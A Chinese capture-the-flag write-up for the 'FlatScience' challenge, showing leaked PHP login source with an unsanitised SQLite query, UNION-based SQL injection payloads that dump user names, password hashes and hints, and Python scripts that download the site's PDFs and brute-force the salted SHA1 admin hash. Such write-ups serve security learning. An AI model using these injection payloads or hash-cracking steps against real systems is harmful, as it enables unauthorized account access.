zoukankan      html  css  js  c++  java
  • FlatScience(sqlite3注入|python->读取PDF)

    进入login.php页面,F12后发现了

    按照文本的提示,我们get传递一下debug参数

    拿到login.php源码:

    <?php
    ob_start();
    ?>
    
    
    <?php
    if(isset($_POST['usr']) && isset($_POST['pw'])){
            $user = $_POST['usr'];
            $pass = $_POST['pw'];
    
            $db = new SQLite3('../fancy.db');
            $res = $db->query("SELECT id,name from Users where name='".$user."' and password='".sha1($pass."Salz!")."'");
    
        if($res){
            $row = $res->fetchArray();
        }
        else{
            echo "<br>Some Error occourred!";
        }
    
        if(isset($row['id'])){
                setcookie('name',' '.$row['name'], time() + 60, '/');
                header("Location: /");
                die();
        }
    
    }
    
    if(isset($_GET['debug']))
    highlight_file('login.php');
    ?>

    审计代码得知数据库采用的是SQLite3,post参数没有过滤

    构造payload获取表名

    url解码得到:

    +CREATE+TABLE+Users(id+int+primary+key,name+varchar(255),password+varchar(255),hint+varchar(255))

    获取用户名

     usr='union select 1,group_concat(name) from Users--+ &pw=1

    获取密码

     usr='union select 1,group_concat(password) from Users--+ &pw=1

     得到admin的密码为:3fab54a50e770d830c0416df817567662a9dc85c

    查找hint字段

    usr='union select 1,group_concat(hint) from Users--+ &pw=1

    解码得到:

    | name   | hint                          |
    | ------ | ----------------------------- |
    | admin  | my fav word in my fav paper?! |
    | fritze | my love is…?                  |
    | hansi  | the password is password      |

    发现只能找到admin的密码了,线索是作者最爱的单词:

    shal(单词+Salz)=3fab54a50e770d830c0416df817567662a9dc85c

    使用前辈的脚本,下载pdf并分析出flag

    #下载pdf
    import urllib.request
    import re
    import os
    
    
    # open the url and read
    def getHtml(url):
        page = urllib.request.urlopen(url)
        html = page.read()
        page.close()
        return html
    
    def getUrl(html):
        reg = r'(?:href|HREF)="?((?:http://)?.+?.pdf)'
        url_re = re.compile(reg)
        url_lst = url_re.findall(html.decode('utf-8'))
        return(url_lst)
    
    def getFile(url):
        file_name = url.split('/')[-1]
        u = urllib.request.urlopen(url)
        f = open(file_name, 'wb')
    
        block_sz = 8192
        while True:
            buffer = u.read(block_sz)
            if not buffer:
                break
    
            f.write(buffer)
        f.close()
        print ("Sucessful to download" + " " + file_name)
    
    #指定网页
    root_url = ['http://220.249.52.133:35791/1/2/5/',
                'http://220.249.52.133:35791/']
    
    raw_url = ['http://220.249.52.133:35791/1/2/5/index.html',
                'http://220.249.52.133:35791/index.html'
               ]
    #指定目录
    os.mkdir('ldf_download')
    os.chdir(os.path.join(os.getcwd(), 'ldf_download'))
    for i in range(len(root_url)):
        print("当前网页:",root_url[i])
        html = getHtml(raw_url[i])
        url_lst = getUrl(html)
    
        for url in url_lst[:]:
            url = root_url[i] + url
            getFile(url)
    #分析脚本
    from
    io import StringIO #python3 from pdfminer.pdfpage import PDFPage from pdfminer.converter import TextConverter from pdfminer.converter import PDFPageAggregator from pdfminer.layout import LTTextBoxHorizontal, LAParams from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter import sys import string import os import hashlib import importlib import random from urllib.request import urlopen from urllib.request import Request def get_pdf(): return [i for i in os.listdir("./ldf_download/") if i.endswith("pdf")] def convert_pdf_to_txt(path_to_file): rsrcmgr = PDFResourceManager() retstr = StringIO() laparams = LAParams() device = TextConverter(rsrcmgr, retstr, laparams=laparams) fp = open(path_to_file, 'rb') interpreter = PDFPageInterpreter(rsrcmgr, device) password = "" maxpages = 0 caching = True pagenos=set() for page in PDFPage.get_pages(fp, pagenos, maxpages=maxpages, password=password,caching=caching, check_extractable=True): interpreter.process_page(page) text = retstr.getvalue() fp.close() device.close() retstr.close() return text def find_password(): pdf_path = get_pdf() for i in pdf_path: print ("Searching word in " + i) pdf_text = convert_pdf_to_txt("./ldf_download/"+i).split(" ") for word in pdf_text: sha1_password = hashlib.sha1(word.encode('utf-8')+'Salz!'.encode('utf-8')).hexdigest() if (sha1_password == '3fab54a50e770d830c0416df817567662a9dc85c'): print ("Find the password :" + word) exit() if __name__ == "__main__": find_password()

    得到admin的密码,登录admin.php页面获取flag

     

  • 相关阅读:
    HDU 4870 Rating(高斯消元 )
    iOS开发者账号详细介绍
    iOS之Block
    CocoaPods 安装和使用
    搭建自己的局域网服务器
    MarkDown语法收集
    正则表达式参考表
    iOS企业级应用打包与部署
    iOS开发之代码加载方式进入APP的界面
    shell脚本小Demo
  • 原文地址:https://www.cnblogs.com/luocodes/p/13864124.html
Copyright © 2011-2022 走看看